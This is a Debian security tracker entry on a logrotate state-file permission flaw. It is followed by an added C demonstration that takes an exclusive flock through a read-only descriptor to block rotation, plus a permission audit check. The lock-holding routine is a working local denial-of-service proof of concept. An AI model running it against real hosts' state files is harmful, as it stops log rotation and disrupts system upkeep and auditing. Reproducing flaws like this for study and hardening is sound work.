Description: A vulnerability was found in logrotate in how the state file is created. The state file is used to prevent parallel executions of multiple instances of logrotate by acquiring and releasing a file lock. When the state file does not exist, it is created with world-readable permission, allowing an unprivileged user to lock the state file, stopping any rotation. Read access is enough because a flock(2)-style lock needs only an open descriptor, not write permission on the file. This flaw affects logrotate versions before 3.20.0.
Source: CVE (at NVD; CERT, LWN, oss-sec, fulldisc, Red Hat, Ubuntu, Gentoo, SUSE bugzilla/CVE, GitHub advisories/code/issues, web search, more)
Debian Bugs: 1011644

Vulnerable and fixed packages

The table below lists information on source packages.

Source Package    Release                Version    Status
logrotate (PTS)   buster                 3.14.0-4   fixed
                  sid, trixie, bookworm  3.21.0-1   fixed

The information below is based on the following data on fixed versions.

Package     Type     Release   Fixed Version    Urgency   Origin   Debian Bugs
logrotate   source   stretch   (not affected)
logrotate   source   buster    (not affected)


[buster] - logrotate <not-affected> (Vulnerable code introduced later)
[stretch] - logrotate <not-affected> (Vulnerable code introduced later)
Introduced by: (3.17.0)
Fixed by: (3.20.0)
Fixed by: (3.20.1)
Packages are built with --with-state-file-path=/var/lib/logrotate/status,
but /var/lib/logrotate has 0755 permissions, so any local user can reach the state file and acquire a lock on it.
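The following is an added example, not code from logrotate or from this tracker page, that reproduces the mechanism the description and the notes above rely on: a state file created 0644 can be opened read-only by any user who can traverse the directory, and flock(2) grants an exclusive lock on that read-only descriptor, so a non-blocking lock attempt by the rotator then fails with EWOULDBLOCK. It assumes logrotate's lock behaves like a non-blocking exclusive flock(2) on the state file (the names `create_state_file`, `attacker_lock`, `rotator_try_lock`, `state_file_exposed` and `run_scenario` are this example's own, and the demo works in a temporary directory under /tmp rather than /var/lib/logrotate). It also includes the permission check an auditor would run against the real state file.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/file.h>
#include <sys/stat.h>
#include <unistd.h>

/* Create a fresh state file with the given mode, bypassing umask so the
 * requested bits are exactly what lands on disk.  0644 mirrors the
 * pre-3.20.0 behaviour the advisory describes; 0600 is the hardened form
 * used here for comparison (assumed, not logrotate's own fix). */
static int create_state_file(const char *path, mode_t mode)
{
    unlink(path);
    mode_t old = umask(0);
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_CLOEXEC, mode);
    umask(old);
    if (fd >= 0)
        close(fd);
    return fd < 0 ? -1 : 0;
}

/* Attacker side: a world-readable file can be opened O_RDONLY by anyone,
 * and flock(2) only needs an open descriptor, not write access, so an
 * exclusive lock can be taken on it.  Returns the held fd, or -1. */
static int attacker_lock(const char *path)
{
    int fd = open(path, O_RDONLY | O_CLOEXEC);
    if (fd < 0)
        return -1;
    if (flock(fd, LOCK_EX | LOCK_NB) != 0) {
        close(fd);
        return -1;
    }
    return fd;  /* the lock is held until this descriptor is closed */
}

/* Rotator side (assumed to mirror logrotate's lock): try a non-blocking
 * exclusive lock.  1 = acquired, 0 = held by someone else, -1 = other error. */
static int rotator_try_lock(const char *path)
{
    int fd = open(path, O_RDWR | O_CLOEXEC);
    if (fd < 0)
        return -1;
    if (flock(fd, LOCK_EX | LOCK_NB) != 0) {
        int saved = errno;
        close(fd);
        return saved == EWOULDBLOCK ? 0 : -1;
    }
    flock(fd, LOCK_UN);
    close(fd);
    return 1;
}

/* Audit check: 1 if group or others can read the state file (exposed),
 * 0 if only the owner can, -1 if it cannot be stat'ed.  Run it against
 * /var/lib/logrotate/status on a real host. */
static int state_file_exposed(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0)
        return -1;
    return (st.st_mode & (S_IRGRP | S_IROTH)) ? 1 : 0;
}

/* Run the scenario for one file mode in a private temp directory.  Fills
 * *exposed with the audit result and returns 1 if a lock taken through a
 * read-only descriptor blocked the rotator, 0 if the rotator got the lock,
 * -1 on setup failure.  Both sides run as the current uid, so for 0600 the
 * open still succeeds here; for a different unprivileged uid it would fail
 * with EACCES, which is the whole point of the tighter mode. */
int run_scenario(mode_t mode, int *exposed)
{
    char dir[] = "/tmp/logrotate-demo-XXXXXX";
    char path[64];
    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(path, sizeof path, "%s/status", dir);

    int result = -1;
    if (create_state_file(path, mode) == 0) {
        *exposed = state_file_exposed(path);
        int held = attacker_lock(path);
        int got = rotator_try_lock(path);
        result = (held >= 0 && got == 0) ? 1 : (got == 1 ? 0 : -1);
        if (held >= 0)
            close(held);
    }
    unlink(path);
    rmdir(dir);
    return result;
}

int main(void)
{
    int exposed = -1;
    int blocked = run_scenario(0644, &exposed);
    printf("mode 0644: exposed=%d rotation_blocked=%d\n", exposed, blocked);
    blocked = run_scenario(0600, &exposed);
    printf("mode 0600: exposed=%d rotation_blocked=%d (same uid; another user could not open it)\n",
           exposed, blocked);
    return 0;
}
```

With the 0644 file the rotator's non-blocking lock fails while a read-only descriptor holds the lock, which is exactly the denial of rotation the advisory describes; the audit helper reports that file as exposed and the 0600 file as not. Note that tightening the file mode alone is only as good as the directory that contains it: a 0755 /var/lib/logrotate lets anyone reach the file, so the file mode, not the directory, is what has to deny the open.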
